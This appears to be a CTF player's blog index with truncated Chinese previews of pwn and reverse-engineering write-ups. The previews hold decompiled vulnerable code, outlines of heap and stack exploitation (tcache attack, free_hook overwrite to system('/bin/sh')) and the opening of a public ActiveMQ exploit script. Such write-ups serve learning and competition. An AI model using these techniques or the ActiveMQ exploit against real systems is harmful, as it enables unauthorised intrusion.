nyyyddddn

nyyyddddn

osu!gaming_CTF_2024
pwnbetterthanufgets那存在一个溢出,覆盖 v6为727,v5的值小于v6就好了 1234567891011121314151617181920212223242526272829303132333435363738int __cdecl main(int argc, const char **argv, const char **envp){ char s[16]; // [rsp+0h] [rbp-20h] BYREF unsigned __int64 v5; // [rsp+10h] [rbp-10h] unsigned int v6; // [rs...
hgame2024week3_wp
pwn你满了,那我就漫出来了![补]123456789101112131415161718192021222324252627282930313233343536373839int __cdecl __noreturn main(int argc, const char **argv, const char **envp){ unsigned int v3; // [rsp+4h] [rbp-Ch] BYREF unsigned __int64 v4; // [rsp+8h] [rbp-8h] v4 = __readfsqword(0x28u); init(argc, ...
sictfr3_pwn_wp
pwn[签到]stack题目逻辑是这样的,其实就是找一个比 0x58 大很多,低一个字节小于 0x40的数,就能溢出了 12345678910111213141516char *run(){ char buf[76]; // [rsp+0h] [rbp-50h] BYREF size_t nbytes; // [rsp+4Ch] [rbp-4h] printf("Give me the length: "); LODWORD(nbytes) = get_int(); if ( (unsigned __int8)nbytes > 0x40u )...
nssr18_wp
唉咱好菜,就出了一题 HappyCTF123456789101112131415161718192021222324252627282930public vulnvuln proc nearbuf= byte ptr -110hvar_8= qword ptr -8; __unwind {endbr64push rbpmov rbp, rspsub rsp, 110hlea rax, aNowPlzYouInput ; "Now,plz you input:"mov rdi, rax ; scall ...
hgame2024week2_pwn_wp
pwnElden Ring Ⅱ一个heap manager相关的题目,glibc 2.31,没有pie,包括add edit show delete四个功能,在delete这里有一个uaf 123456789101112131415161718void delete_note(){ unsigned int v0; // [rsp+Ch] [rbp-4h] BYREF printf("Index: "); __isoc99_scanf("%u", &v0); if ( v0 <= 0xF ) { i...
0xl4ugh_pwn
pwnpwn1glibc 2.31 有pie,choice 10能分一个很大的堆块,所以思路是把tcache填满,然后free掉一个大堆块,通过unsortedbin去泄露libc的地址,然后通过tcache bin attack去写free hook为system,再去free掉一块内容为binsh的堆 触发system(/bin/sh) 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616...
hgame2024week1_wp
reezASMcheckflag可以看出 cmp的逻辑是 异或0x22 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162section .data c db 74, 69, 67, 79, 71, 89, 99, 113, 111, 125, 107, 81, 125, 107, 79, 82, 18, 80, 86, 22, 76, 86, 125, 22, 125, 112, 71, 84, 17,...
beginctf2024_wp
pwnone_byte刚刚好能覆盖返回地址一个字节,看了一下返回地址是一个libc的地址,29dxx,把29dxx附件的汇编看了一遍,没有很直接的输出函数,或者是跳转到输出函数的汇编,。那这时候的思路是把一个字节爆破一遍,把有输出的字节全部记录下来,最后发现在 \x89那回到了main函数,把下一位flag输出出来了 12.text:0000000000029D89 48 8B 44 24 08 mov rax, [rsp+98h+var_90].text:0000000000029D8E FF D0 ...
rw体验赛wp
唉,咱好菜,就出了两个题,ghostscript那个题调了半天没调通 Be-an-ActiveMq-Hacker搜了一下 用网上的exp打通了 https://blog.csdn.net/weixin_49125123/article/details/135577221 12345678910111213141516171819202122232425262728293031323334353637import ioimport socketimport sysdef main(ip, port, xml): classname = "org.springframewor...
nssctfr16_wp
pwnnc_pwnre一个异或的逻辑, 异或后是一串base64编码,提交解码后的文本就进到shell了 1234a = [0x44,0x7c,0x5e,0x44,0x41,0x21,0x42,0x57,0x75,0x21,0x74,0x56,0x44,0x57,0x5d,0x67,0x44,0x46,0x29,0x45,0x5d,0x56,0x29,0x67,0x46,0x22,0x25,0x76,0x74,0x6a,0x52,0x69,0x5d,0x47,0x41,0x78,0x76,0x41,0x2d,0x2d]for i in a: print(chr(i ^ 0x10),...
avatar
nyyyddddn
快来和我贴贴qaq